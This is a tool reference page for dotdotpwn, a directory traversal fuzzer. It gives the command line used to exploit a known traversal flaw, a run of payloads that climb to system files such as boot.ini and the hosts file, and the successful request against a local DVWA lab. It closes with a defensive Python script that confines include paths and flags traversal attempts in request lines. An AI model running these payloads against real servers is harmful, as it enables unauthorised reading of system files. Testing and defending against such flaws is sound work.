dotdotpwn
Phase(s):
Primary: Exploitation.
Secondary: Discovery.
Description:
Tool that helps verify Path Traversal vulnerabilities and exploit them by providing the required payload.
Objective:
- Verify the presence of Path Traversal vulnerabilities on web applications.
- Obtain the required payload to exploit the Path Traversal vulnerability.
Features:
Supported technologies: FTP, TFTP, web applications (HTTP/ HTTPS).
Operating mode: Active.
Verify the presence of Path Traversal vulnerabilities on web applications.
- Verifies the vulnerability through configurable fuzzing in which the file extension to look for and the traversal depth can be specified.
- Support for multiple operating systems: Windows, Unix, generic, etc.
- Support for multiple services: FTP, TFTP, HTTP, HTTPS.
- Support for multiple HTTP methods: GET, POST, HEAD, COPY, MOVE.
Reports:
Output reports: ✔
- Plain text file with a default name of HOST_mm-dd-yyyy_hh-mm.txt, which can be changed with the -r option.
Basic usage:
Exploit a Path Traversal vulnerability on a web application. The following command starts the verification tests for an already identified Path Traversal vulnerability:
./dotdotpwn.pl -m payload -h 127.0.0.1 -p /security/requestDot.txt -k "localhost" -r filePayload_report.txt -o windows -x 9001 -b
Where:
- -m: Required module (http, http-url, payload).
- -h: Target host.
- -p: File containing the request, including the vulnerable parameter.
- -k: String to search for in the response the server returns for each request sent.
- -r: File where the results are saved.
- -o: Operating system of the target (windows, unix, generic).
- -x: Web server port.
- -b: Stop after the first successful traversal.
When the tool starts, it displays information about the test to be run.
#####################################################
# #
# CubilFelino Chatsubo #
# Security Research Lab and [(in)Security Dark] Labs #
# chr1x.sectester.net chatsubo-labs.blogspot.com #
# #
# pr0udly present: #
# #
# ________ __ ________ __ __________ #
# \______ \ ____ _/ |_\______ \ ____ _/ |_\______ \__ _ __ ____ #
# | | \ / _ \\ __\| | \ / _ \\ __\| ___/\ \/ \/ // \ #
# | ` \( <_> )| | | ` \( <_> )| | | | \ /| | \ #
# /_______ / \____/ |__| /_______ / \____/ |__| |____| \/\_/ |___| / #
# \/ \/ \/ #
# - DotDotPwn v3.0 - #
# The Directory Traversal Fuzzer #
# http://dotdotpwn.sectester.net #
# dotdotpwn@sectester.net #
# #
# by chr1x & nitr0us #
#######################################################
[+] Report name: Reports/192.168.77.129_10-23-2013_13-03.txt
[========== TARGET INFORMATION ==========]
[+] Hostname: 127.0.0.1
[+] Setting Operating System type to "windows"
[+] Protocol: N/A
[+] Port: 9001
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (windows)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 7320
The tool then asks you to press Enter to start the test, and Ctrl+C stops it if required.
[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)
As the test progresses, the tool displays the payloads used in each request.
[*] Payload with: ../boot.ini
[*] Payload with: ../windows/system32/drivers/etc/hosts
[*] Payload with: ../../boot.ini
[*] Payload with: ../../windows/system32/drivers/etc/hosts
[*] Payload with: ../../../boot.ini
[*] Payload with: ../../../windows/system32/drivers/etc/hosts
[*] Payload with: ../../../../boot.ini
When the tool detects a successful injection by finding the search string (-k) in the server response, it stops the testing process (-b). It displays the message "VULNERABLE PAYLOAD" together with the request that was detected as vulnerable.
[*] VULNERABLE PAYLOAD:
GET /dvwa/vulnerabilities/fi/?page=../../../../../windows/system32/drivers/etc/hosts HTTP/1.1
Host: 127.0.0.1:9001
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:9001/dvwa/vulnerabilities/fi/?page=include.php
Cookie: security=low; PHPSESSID=o56i5hhsgim5rag4bjrj2ruhk6
Connection: keep-alive
Finally, the tool prints a summary of the test performed and the path where the results were exported.
[+] Fuzz testing finished after 0.97 minutes (58 seconds)
[+] Total Traversals found: 1
[+] Report saved: Reports/filePayload_report.txt
Example report:
[+] Date and Time: 10-23-2013 13:14:30
[========== TARGET INFORMATION ==========]
[+] Hostname: 127.0.0.1
[+] Setting Operating System type to "windows"
[+] Protocol: N/A
[+] Port: 9001
[=========== TRAVERSAL ENGINE ===========]
[+] Traversal Engine DONE ! - Total traversal tests created: 7320
[+] Fuzz testing finished after 0.97 minutes (58 seconds)
[+] Total Traversals found: 1
[*] VULNERABLE PAYLOAD:
GET /dvwa/vulnerabilities/fi/?page=../../../../../windows/system32/drivers/etc/hosts HTTP/1.1
Host: 127.0.0.1:9001
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:9001/dvwa/vulnerabilities/fi/?page=include.php
Cookie: security=low; PHPSESSID=o56i5hhsgim5rag4bjrj2ruhk6
Connection: keep-alive
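The vulnerable request in the report above exists because the "page" parameter is joined onto an include path without being confined to a directory. The following Python script is an added example, not part of dotdotpwn or of this page: it shows the defender-side check that makes such a fuzzing run come back empty (resolve the requested name against a fixed include directory and reject anything that escapes it), and a companion detector that flags request lines carrying the dot-and-slash patterns the fuzzer sends. The base directory /srv/app/includes and the sample request lines are constructed for the example; only the first GET line mirrors the payload shown in the report.

```python
"""
Defender-side counterpart to a dotdotpwn run (added example, not project code):
confine a user-supplied include name to one directory, and flag traversal
attempts in request lines such as the ones the fuzzer generates.
"""
import os
import urllib.parse

# Constructed sample request lines, modelled on the payloads in the report above.
# Only the second line is the exact request dotdotpwn reported as vulnerable.
SAMPLE_REQUESTS = [
    "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1",
    "GET /dvwa/vulnerabilities/fi/?page=../../../../../windows/system32/drivers/etc/hosts HTTP/1.1",
    "GET /dvwa/vulnerabilities/fi/?page=..%2f..%2fboot.ini HTTP/1.1",
    "GET /dvwa/vulnerabilities/fi/?page=..\\..\\boot.ini HTTP/1.1",
    "GET /dvwa/vulnerabilities/fi/?page=%2e%2e/%2e%2e/etc/passwd HTTP/1.1",
]


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly until stable; the fuzzer mixes single and
    double encoded dots and slashes, and a one-shot decode misses the latter."""
    for _ in range(rounds):
        new = urllib.parse.unquote(value)
        if new == value:
            break
        value = new
    return value


def safe_include_path(base_dir, requested):
    """Return the absolute file to include, or None if the request escapes base_dir.

    The check is done on the resolved path, not on the input string, so every
    encoding, depth and slash style collapses to the same yes/no decision.
    """
    decoded = decode_fully(requested)
    if "\x00" in decoded:          # NUL truncation tricks are never legitimate
        return None
    # Treat backslashes as separators so Windows-style payloads are normalized too.
    decoded = decoded.replace("\\", "/")
    base = os.path.realpath(base_dir)
    # os.path.join discards base if decoded is absolute; realpath then reveals that.
    candidate = os.path.realpath(os.path.join(base, decoded))
    # Separator-suffixed prefix check: "/srv/app/includes2" must not pass as inside.
    if candidate != base and not candidate.startswith(base + os.sep):
        return None
    return candidate


def page_param(request_line):
    """Extract the 'page' query parameter from a raw request line, or None."""
    parts = request_line.split(" ", 2)
    if len(parts) != 3:
        return None
    query = urllib.parse.urlsplit(parts[1]).query
    # parse_qs performs the first percent-decoding round itself.
    params = urllib.parse.parse_qs(query, keep_blank_values=True)
    return params.get("page", [None])[0]


def is_traversal_attempt(request_line):
    """Heuristic detector for log review: deliberately broad, since a legitimate
    include name never needs '..', an absolute path or a NUL byte."""
    value = page_param(request_line)
    if value is None:
        return False
    decoded = decode_fully(value).replace("\\", "/")
    return ".." in decoded or decoded.startswith("/") or "\x00" in decoded


def scan_requests(request_lines):
    """Return the request lines that look like traversal attempts."""
    return [line for line in request_lines if is_traversal_attempt(line)]


if __name__ == "__main__":
    base = "/srv/app/includes"          # constructed include directory
    for line in SAMPLE_REQUESTS:
        name = page_param(line)
        print(f"{'FLAG ' if is_traversal_attempt(line) else 'ok   '} "
              f"page={name!r} -> serve={safe_include_path(base, name)}")
```

The two functions answer different questions: safe_include_path is what the application should call before opening a file, and it is what turns the fuzzer's 7320 test cases into 7320 rejections; is_traversal_attempt is what a log review or WAF rule can apply to the request lines dotdotpwn leaves behind, so that a scan like the one above shows up in monitoring even when the application is already patched.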
Resources:
Link: http://dotdotpwn.sectester.net
Author(s): chr1x & nitr0us
Contact: dotdotpwn [at]sectester.net
License: